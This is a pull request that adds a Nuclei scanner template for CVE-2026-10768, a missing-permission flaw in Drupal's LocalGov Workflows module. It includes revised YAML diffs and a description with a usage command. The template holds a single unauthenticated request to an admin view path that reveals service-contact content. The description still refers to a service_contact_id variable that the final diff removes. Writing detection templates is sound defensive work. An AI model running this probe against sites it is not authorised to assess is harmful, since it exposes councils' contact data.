### PR TITLE
Add CVE-2026-10768 Drupal LocalGov Workflows content disclosure

### DIFF
--- a/http/cves/2026/CVE-2026-10768.yaml
+++ b/http/cves/2026/CVE-2026-10768.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-10768
+
+info:
+  name: Drupal LocalGov Workflows < 1.6.0 - Unauthenticated Service Contact Content Disclosure
+  author: str4k3r
+  severity: critical
+  description: |
+    LocalGov Workflows versions before 1.6.0 expose the Content by owner
+    view to the access content permission, which is granted to anonymous users
+    on a standard Drupal site. An unauthenticated request to the view can
+    disclose service-contact names and the content assigned to them. Release
+    1.6.0 changes the view permission to administer localgov_service_contact.
+  reference:
+    - https://www.drupal.org/sa-contrib-2026-039
+    - https://www.drupal.org/project/localgov_workflows/releases/1.6.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-10768
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-10768
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 1
+    product: drupal-localgov-workflows
+    vendor: drupal
+  tags: cve,cve2026,drupal,localgov,information-disclosure,unauth
+
+http:
+  - raw:
+      - |
+        GET /admin/content/localgov-service-contact/content-by-owner?service-contact-id={{service_contact_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'Content by owner'
+
+variables:
+  service_contact_id: ""

--- a/http/cves/2026/CVE-2026-10768.yaml
+++ b/http/cves/2026/CVE-2026-10768.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-10768
 
 info:
-  name: Drupal LocalGov Workflows < 1.6.0 - Unauthenticated Contact Content Disclosure
+  name: Drupal LocalGov Workflows < 1.6.0 - Information Disclosure
   author: str4k3r
   severity: high
   description: |
@@ -26,7 +26,7 @@ info:
     product: localgov_workflows
     framework: drupal
     fofa-query: 'body="/modules/contrib/localgov"'
-  tags: cve,cve2026,drupal,localgov,disclosure,unauth
+  tags: cve,cve2026,drupal,localgov,exposure
 
 http:
   - raw:
@@ -37,8 +37,8 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "status_code == 200"
-          - "contains(body, 'view-id-localgov_content_by_owner')"
           - "contains_all(body, 'views-field-title', 'views-field-user', 'views-field-status')"
+          - "contains(body, 'view-id-localgov_content_by_owner')"
           - "!contains(body, 'views-empty')"
+          - "status_code == 200"
         condition: and

--- a/http/cves/2026/CVE-2026-10768.yaml
+++ b/http/cves/2026/CVE-2026-10768.yaml
@@ -1,47 +1,44 @@
 id: CVE-2026-10768
 
 info:
-  name: Drupal LocalGov Workflows < 1.6.0 - Unauthenticated Service Contact Content Disclosure
+  name: Drupal LocalGov Workflows < 1.6.0 - Unauthenticated Contact Content Disclosure
   author: str4k3r
-  severity: critical
+  severity: high
   description: |
-    LocalGov Workflows versions before 1.6.0 expose the Content by owner
-    view to the access content permission, which is granted to anonymous users
-    on a standard Drupal site. An unauthenticated request to the view can
-    disclose service-contact names and the content assigned to them. Release
-    1.6.0 changes the view permission to administer localgov_service_contact.
+    Drupal LocalGov Workflows < 1.6.0 contains a broken access control vulnerability caused by missing authorization checks, letting attackers perform forceful browsing to access unauthorized resources, exploit requires no special privileges.
+  impact: |
+    Attackers can access unauthorized resources, potentially exposing sensitive data or functionality.
+  remediation: |
+    Update to a version later than 1.6.0 or the latest available version.
   reference:
     - https://www.drupal.org/sa-contrib-2026-039
     - https://www.drupal.org/project/localgov_workflows/releases/1.6.0
     - https://nvd.nist.gov/vuln/detail/CVE-2026-10768
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2026-10768
     cwe-id: CWE-862
   metadata:
     verified: true
     max-request: 1
-    product: drupal-localgov-workflows
     vendor: drupal
-  tags: cve,cve2026,drupal,localgov,information-disclosure,unauth
+    product: localgov_workflows
+    framework: drupal
+    fofa-query: 'body="/modules/contrib/localgov"'
+  tags: cve,cve2026,drupal,localgov,disclosure,unauth
 
 http:
   - raw:
       - |
-        GET /admin/content/localgov-service-contact/content-by-owner?service-contact-id={{service_contact_id}} HTTP/1.1
+        GET /admin/content/localgov-service-contact/content-by-owner HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - 'Content by owner'
-
-variables:
-  service_contact_id: ""
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, 'view-id-localgov_content_by_owner')"
+          - "contains_all(body, 'views-field-title', 'views-field-user', 'views-field-status')"
+          - "!contains(body, 'views-empty')"
+        condition: and


### PR DESCRIPTION
## Vulnerability
LocalGov Workflows 1.5.0 exposes the “Content by owner” view to anonymous callers. The 1.6.0 fix requires the appropriate administer permission before the view can be queried.

## Template behavior
The template requests `/admin/content/localgov-service-contact/content-by-owner` with a service-contact identifier and matches the returned view content. It detects the anonymous authorization failure in the vulnerable module.

## Required configuration
Set `service_contact_id` to an existing service-contact ID on the target. The target must have the LocalGov Workflows module and a record that can be returned by the view.

## Impact
Unauthorized users may enumerate or read service-contact content that should require Drupal permissions.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-10768.yaml -var service_contact_id=<service-contact-id>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
